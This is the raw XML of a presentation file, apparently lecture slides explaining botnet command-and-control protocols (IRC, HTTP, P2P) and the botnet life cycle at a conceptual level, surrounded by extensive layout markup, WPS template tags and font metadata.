            <a:endParaRPr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What is Bot C&amp;C?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object 2" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234377d220a7d0a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577215" y="1023620"/>
            <a:ext cx="10798175" cy="3192145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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405" marR="344805" indent="-180340" fontAlgn="auto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SzPct val="200000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="193675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Today, bot herders primarily rely on these three protocols for their C&amp;C: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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Internet Relay Chat (IRC) Protocol</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Hyper-Text Transfer Protocol (HTTP)</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Peer-to-Peer (P2P) networking protocols.</a:t>
            </a:r>
            <a:endParaRPr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A728B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C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Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs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Botnet and bot Life Cycle？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object 3" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313537347d220a7d0a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540385" y="1201420"/>
            <a:ext cx="6083300" cy="4998720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16954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buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="213360" algn="l"/>
              </a:tabLst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Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr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45" marR="5080" lvl="1" indent="-179705"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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herder</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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configures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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initial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parameters:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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infection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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vectors,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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payload,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stealth,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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details</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" marR="411480" lvl="1" indent="-179705"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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herder</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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registers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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server</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" lvl="1" indent="-179705"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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herder</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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launches,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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seeds</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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bots</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" lvl="1" indent="-179705"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Bots</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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spread,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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grow</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" lvl="1" indent="-179705"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Other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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steal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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bots</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" lvl="1" indent="-179705"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Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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reaches</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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stasis,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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stops</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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growing</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" marR="262890" lvl="1" indent="-179705"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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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herder</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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abandons</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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botnet,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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severs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traces</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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thereto</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" lvl="1" indent="-179705"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6565" algn="l"/>
              </a:tabLst>
            </a:pP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Bot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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herder</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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unregisters</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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5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DNS</a:t>
            </a:r>
            <a:endParaRPr sz="22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60045" indent="-179705"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sz="2200" b="0" spc="-1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server</a:t>
            </a:r>
            <a:endParaRPr sz="2200" b="0" spc="-1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bject 4" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313537347d220a7d0a"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082790" y="1505585"/>
            <a:ext cx="4570095" cy="4391025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="169545" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="213360" algn="l"/>
              </a:tabLst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Bot</a:t>
            </a:r>
            <a:r>
              <a:rPr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45" marR="947420" lvl="1" indent="-179705" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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establishes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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2200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compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200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endParaRPr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45" marR="5080" lvl="1" indent="-179705" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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scans</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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200" spc="-3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sz="2200" spc="-5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sz="2200" spc="-2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“spread”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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itself</a:t>
            </a:r>
            <a:endParaRPr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45" lvl="1" indent="-179705" fontAlgn="auto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User,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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sz="2200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2200" spc="-2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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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</a:t>
            </a:r>
            <a:endParaRPr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45" lvl="1" indent="-179705" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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2200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takedown</a:t>
            </a:r>
            <a:endParaRPr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45" lvl="1" indent="-179705" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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upgrades</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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itself</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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200" spc="-2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2200" spc="-3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2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45" lvl="1" indent="-179705" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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sits</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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idle,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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awaiting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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endParaRPr sz="2200" spc="-1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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag494.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="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BEAUTIFY_FLAG" val="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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag529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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag536.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag537.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag538.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag539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40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag541.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag542.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="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BEAUTIFY_FLAG" val="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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag549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50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag551.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag557.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="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KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag564.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag565.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag566.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag567.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag568.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag569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70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag571.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag572.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag573.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag574.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag575.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag576.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag577.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag578.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag579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80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag581.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag582.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag583.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag584.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag585.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag586.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag587.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag588.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag589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590.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag591.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag592.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag593.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag594.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag595.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag596.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag597.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag598.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59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0.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag601.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag602.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag603.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag604.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag605.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag606.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag607.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag608.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag609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10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag611.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag612.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SPECIAL_SOURCE" val="bdnull"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="diagram20227964_3"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="0"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="3"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227964"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="3"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="913.55*403"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="0*66.25"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag613.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ==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6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7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8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9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0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9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0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1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2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2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2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2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2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3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3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3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3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3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3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3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3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3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4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4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4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4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4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4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4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4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lang="en-US" sz="1500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="0202060305040502030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4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4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5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5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5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19044</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>600</Paragraphs>
  <Slides>32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69</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="125" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案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13_自定义设计方案</vt:lpstr>
      <vt:lpstr>14_自定义设计方案</vt:lpstr>
      <vt:lpstr>15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案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31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</vt:lpstr>
      <vt:lpstr>13_Office 主题</vt:lpstr>
      <vt:lpstr>25_Office 主题</vt:lpstr>
      <vt:lpstr>26_Office 主题</vt:lpstr>
      <vt:lpstr>27_Office 主题</vt:lpstr>
      <vt:lpstr>28_Office 主题</vt:lpstr>
      <vt:lpstr>29_Office 主题</vt:lpstr>
      <vt:lpstr>31_Office 主题</vt:lpstr>
      <vt:lpstr>32_Office 主题</vt:lpstr>
      <vt:lpstr>33_Office 主题</vt:lpstr>
      <vt:lpstr>34_Office 主题</vt:lpstr>
      <vt:lpstr>35_Office 主题</vt:lpstr>
      <vt:lpstr>36_Office 主题</vt:lpstr>
      <vt:lpstr>37_Office 主题</vt:lpstr>
      <vt:lpstr>38_Office 主题</vt:lpstr>
      <vt:lpstr>39_Office 主题</vt:lpstr>
      <vt:lpstr>40_Office 主题</vt:lpstr>
